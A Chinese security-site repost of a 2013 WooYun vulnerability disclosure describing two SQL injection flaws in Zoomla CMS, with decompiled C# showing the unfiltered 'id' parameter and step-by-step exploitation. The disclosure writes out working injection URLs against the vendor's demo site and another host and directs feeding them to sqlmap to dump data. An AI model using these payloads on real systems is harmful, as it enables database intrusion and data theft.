热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

逐浪CMS通用型SQL注入8+9(select型)

发布时间:2013-12-24 18:43文章来源:wooyun文章作者:wefgod 点击次数:
摘要:漏洞作者: wefgod 提交时间: 2013-12-19 11:58 公开时间: 2013-12-24 11:59 漏洞类型: SQL注射漏洞 简要描述: 似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了,暂时还不知道是用什么方法,以后如果研究出来的话再说吧。所以官方别再扯什么XXX...

漏洞作者: wefgod

提交时间: 2013-12-19 11:58
公开时间: 2013-12-24 11:59

漏洞类型: SQL注射漏洞
简要描述:

似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了,暂时还不知道是用什么方法,以后如果研究出来的话再说吧。所以官方别再扯什么XXX源码包了,不开源不是丢人的事情,但是忽悠客户不是很好吧。
详细说明:

相关的类:

public class MIS_Target_planList : Page, IRequiresSessionState

public class MIS_Target_ProList : Page, IRequiresSessionState

漏洞证明:

注入点1:

 

  1. public class MIS_Target_planList : Page, IRequiresSessionState 
  2.  
  3. protected void Page_Load(object sender, EventArgs e) 
  4.  
  5.  
  6. this.buser.CheckIsLogin(); 
  7.  
  8. if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["id"])) 
  9.  
  10.  
  11. this.id = DataConverter.CLng(base.Request["id"]); //id参数第一次过滤了 
  12.  
  13. thisthis.dt = this.bll.Sel("MID =" + base.Request["id"], "ID desc"); //id参数第二次直接带入查询中了 
  14.  
  15. if (this.dt != null && this.dt.Rows.Count > 0) 
  16.  
  17.  
  18. thisthis.Repeater3.DataSource = this.dt; 
  19.  
  20. this.Repeater3.DataBind(); 
  21.  
  22.  
  23.  

 

前台注册用户。

http://demo.zoomla.cn/Mis/Plan/AddPlan.aspx

添加计划

访问http://demo.zoomla.cn/mis/target/planList.aspx?id=0

可以看见计划都列出来了,把上面这个URL丢到工具里面,带上cookie即可:

 

逐浪CMS通用型SQL注入8+9(select型)

 

 

注入点2:

 

  1. public class MIS_Target_ProList : Page, IRequiresSessionState 
  2.  
  3. protected global_asax ApplicationInstance 
  4.  
  5.  
  6. get 
  7.  
  8.  
  9. return (global_asax)this.Context.ApplicationInstance; 
  10.  
  11.  
  12.  
  13. protected void Page_Load(object sender, EventArgs e) 
  14.  
  15.  
  16. this.buser.CheckIsLogin(); 
  17.  
  18. if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["types"]) && base.Request["types"].ToString() == "7" && !string.IsNullOrEmpty(base.Request["id"])) 
  19.  
  20.  
  21. this.id = DataConverter.CLng(base.Request["id"]); 
  22.  
  23. thisthis.dt = this.bll.Sel("TargetID like '%" + base.Request["id"] + "%' And IsSystem=0 ", "ID desc"); //id参数没有过滤就带入SQL查询 
  24.  
  25. if (this.dt != null && this.dt.Rows.Count > 0) 
  26.  
  27.  
  28. thisthis.Repeater3.DataSource = this.dt; 
  29.  
  30. this.Repeater3.DataBind(); 
  31.  
  32.  
  33.  

 

注册前台用户并登录

http://demo.zoomla.cn/Mis/Project/Default.aspx

点击新建项目

随意新建一个项目。

打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3

页面空白

打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3%' or '%'='

所有添加的项目信息都在里面

把下面的链接还有cookie丢sqlmap就可以暴数据了

http://www.yunsec.net/mis/target/prolist.aspx?types=7&id=3%' or '1'='1'*--

 

逐浪CMS通用型SQL注入8+9(select型)
逐浪CMS通用型SQL注入8+9(select型)

 

标签分类:

上一篇:Discuz某文库插件任意本地下载
下一篇:appcms 最新版 1.3.708 任意文件下载